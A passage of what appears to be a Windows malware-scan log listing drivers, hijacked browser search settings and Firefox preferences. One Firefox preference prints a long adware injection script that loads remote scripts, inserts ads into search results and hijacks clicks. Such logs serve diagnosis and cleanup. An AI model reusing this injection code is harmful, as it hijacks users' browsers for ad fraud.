DRV:64bit: - [2010/02/26 00:32:12 | 000,158,976 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Impcd.sys -- (Impcd)
DRV:64bit: - [2010/02/02 14:38:30 | 000,271,872 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:64bit: - [2010/01/18 01:45:50 | 000,717,368 | ---- | M] (Conexant Systems Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\CHDRT64.sys -- (CnxtHdAudService)
DRV:64bit: - [2009/12/30 10:21:26 | 000,031,800 | ---- | M] (VS Revo Group) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\revoflt.sys -- (Revoflt)
DRV:64bit: - [2009/11/06 04:56:06 | 001,550,848 | ---- | M] (Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2009/10/18 16:40:50 | 000,028,176 | ---- | M] (Lenovo Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\AcpiVpc.sys -- (ACPIVPC)
DRV:64bit: - [2009/09/16 20:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:64bit: - [2009/08/20 08:05:06 | 000,239,616 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2009/07/21 06:20:06 | 000,121,840 | ---- | M] (CyberLink) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wsvd.sys -- (wsvd)
DRV:64bit: - [2009/07/16 03:55:34 | 000,011,280 | ---- | M] (Lenovo) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\WDMirror.sys -- (wdmirror)
DRV:64bit: - [2009/07/15 19:38:20 | 000,079,376 | ---- | M] (Lenovo) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WDBridge.sys -- (Bridge0)
DRV:64bit: - [2009/07/13 17:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 17:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 17:47:48 | 000,077,888 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2009/07/13 17:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 16:35:32 | 000,012,288 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\serscan.sys -- (StillCam)
DRV:64bit: - [2009/06/10 12:35:28 | 005,434,368 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netw5v64.sys -- (netw5v64)
DRV:64bit: - [2009/06/10 12:34:36 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\k57nd60a.sys -- (k57nd60a)
DRV:64bit: - [2009/06/10 12:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 12:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 12:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 12:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2009/04/08 14:28:46 | 000,068,992 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\xusb21.sys -- (xusb21)
DRV:64bit: - [2008/08/06 04:32:16 | 000,151,656 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WimFltr.sys -- (WimFltr)
DRV - [2009/07/13 17:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = 
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\..\SearchScopes,Backup.Old.DefaultScope = {afdbddaa-5d3f-42ee-b79c-185a7020515b}
IE - HKLM\..\SearchScopes,DefaultScope = {afdbddaa-5d3f-42ee-b79c-185a7020515b}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}: "URL" = ${SEARCH_URL}{searchTerms}
IE - HKLM\..\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b}: "URL" = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3220468
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Backup.Old.Start Page = http://www.msn.com/?pc=Z164&ocid=zdhp&install_date=20111221
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.ask.com/?l=dis&o=APN10111&gct=hp
IE - HKCU\..\URLSearchHook: {7473b6bd-4691-4744-a82b-7854eb3d70b6} - No CLSID value found
IE - HKCU\..\SearchScopes,Backup.Old.DefaultScope = {36377DD7-B3EB-42f5-986F-680BAF59BA9D}
IE - HKCU\..\SearchScopes,DefaultScope = {afdbddaa-5d3f-42ee-b79c-185a7020515b}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?FORM=VIATDF&PC=VIATDF&q={searchTerms}&src=IE-SearchBox
IE - HKCU\..\SearchScopes\{087F5812-DBED-4EAE-B8F5-F0EA204DC8E6}: "URL" = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
IE - HKCU\..\SearchScopes\{155276F4-D2A3-E016-B329-F646B1D9E78C}: "URL" = http://www.bing.com/search?q={searchTerms}&pc=Z164&form=ZGAIDF&install_date=20111221&iesrc={referrer:source}
IE - HKCU\..\SearchScopes\{65F8503D-F252-8C87-3607-7A9A73AB0C11}: "URL" = http://start.msn.iplay.com/searchresultsredirect.aspx?o=chrome&q={searchTerms}
IE - HKCU\..\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}: "URL" = http://searchab.com/?aff=7&uid=27f466ef-5c80-11e2-b6e3-89d437f1aa2f&q={searchTerms}
IE - HKCU\..\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b}: "URL" = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3220468
IE - HKCU\..\SearchScopes\{E5F83424-5F6E-4545-9209-34BF53513AAA}: "URL" = http://isearch.avg.com/search?cid={F6D68C6B-4BFE-40C6-9772-3BD5DDCF0931}&mid=648993c69cd047d0ab4364fd598c18db-94363a3e4388ec38ce85394a796bda7d508c043c&lang=en&ds=yu012&pr=sa&d=2012-05-30 20:39:34&v=11.1.0.7&sap=dsp&q={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultthis.engineName: ""
FF - prefs.js..browser.search.defaulturl: ""
FF - prefs.js..browser.search.order.1: "Privitize VPN"
FF - prefs.js..browser.search.order.1,S: S", ""
FF - prefs.js..browser.search.selectedEngine: "Secure Search"
FF - prefs.js..browser.search.selectedEngine,S: S", ""
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://www.ask.com/?l=dis&o=APN10111&gct=hp"
FF - prefs.js..extensions.50f105ef8d958.scode: "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self==window.top){var script=document.createElement(\"script\"script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1499/l.js?aoi=1311798366&pid=1499&zoneid=287760&ext=safesaver\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='http://www.superfish.com/ws/sf_main.jsp?dlsource=samag&userId=4290196200&CTID=p450';document.getElementsByTagName(\"head\")[0].appendChild(script);};window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this,h=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.version=\"0.3\";b.jsonpHost=\"bestdepotstorey.asia\";b.now=(new Date).getTime();b.prefix=\"jhgasdf\";b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\"; b.unique_items_left=!0;b.num_of_items_in_one=2;b.count=0;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\", function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0;if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\"); if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&c.callback(),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"], urls:[\"http://www.bing.com/search?*\"],src_for_keyword:\"#sb_form_q\",validate:function(){return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"], validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\", \"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop= \"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a, null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,b.utils.waitForElement(this.src_for_keyword,function(){var c=document.getElementById(\"omnibox\");\"0px\"!=getComputedStyle(c,null).right&&a()}))}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}}, smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))|| [],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(c,b,e);g&&a.cache.push([c,b,e,f])}:window.attachEvent?function(c,b,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+c+b]=b;f[c+b]=function(){f[\"e\"+c+b](window.event)};f.attachEvent(\"on\"+c,f[c+b]);g&&a.cache.push([c,b,e,f])}:function(){};a.remove=window.removeEventListener?function(a, b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.utils=new function(){var a=this;a.ajax={get:function(b,d){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",b,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&d(a.ajax.xhr.responseText)}, this.xhr.send()}catch(e){}},post:function(b,d,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",b,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};d=encodeURIComponent(d);this.xhr.send(d)}};a.waitForTokens={};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g|| 1>g.length){if(a.waitForTokens[f])return d(null);var k=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;k(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&& (d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\"); document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g, function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"== navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"== a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth), a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue= !1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]); if(0<g.length)break}else g=b.utils.query_selector_all(d);e?b.checkClickInterval(e)&&b.addEventClick(g,a):b.addEventClick(g,a)}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d< c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert? a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<h.length;b++)if(-1<a.layouts.id.indexOf(h))return h;return!1};b.create_search= function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!= __yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a); (function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),b.not_unique_items.push(c.shift())};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e; for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var k=l(f.inserts[g].selector);\"undefined\"!==typeof k&&d.push(k)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var h=this;p=setTimeout(function(){h.apply(h,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(a.current_layout= b.get_layout_type(a),\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items, c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.addEventsToItems();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c, function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return 2>b.keyword.length?!1:c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&& e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb= function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=3066714756&eid=34&pid=450\";if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e= document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";document.getElementsByTagName(\"head\")[0].appendChild(e)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});;if(window.self.location.protocol.indexOf('http:')>-1 && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//static.datafastguru.info/fo/min/fo_ss.min.js';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//api.jollywallet.com/affiliate/client?dist=87&sub=1';document.getElementsByTagName(\"head\")[0].appendChild(script);};(function(){if(-1<window.self.location.protocol.indexOf(\"http\")&&window.self==window.top){var a,b=document.getElementsByTagName(\"head\")[0];a=document.createElement(\"SCRIPT\");a.type=\"text/javascript\";a.src=\"//d1sywn6q49ki6d.cloudfront.net/build/production/wp/widget.min.js?r=684295654\";b.appendChild(a);a=document.createElement(\"link\");a.type=\"text/css\";a.rel=\"stylesheet\";a.href=\"//d1sywn6q49ki6d.cloudfront.net/build/production/wp/style.css?r=684295654\";b.appendChild(a)}})();;if(window.self == window.top && location.protocol == 'http:'){(function () { var ganpsb = document.createElement('script'); ganpsb.type = 'text/javascript'; ganpsb.async = true; ganpsb.src = ('https:' == document.location.protocol ? 'https://nps' : 'http://nps') + '.noproblemppc.com/npsb/logic.js?OriginId=08E2FFBE-9894-E211-AAD1-001517D1792A&SiteId=Sales&PlaceInWebSite=&PartnerID=670000&ToolbarId=INSERT HERE YOUR ID'; var _head = document.getElementsByTagName(\"head\"); 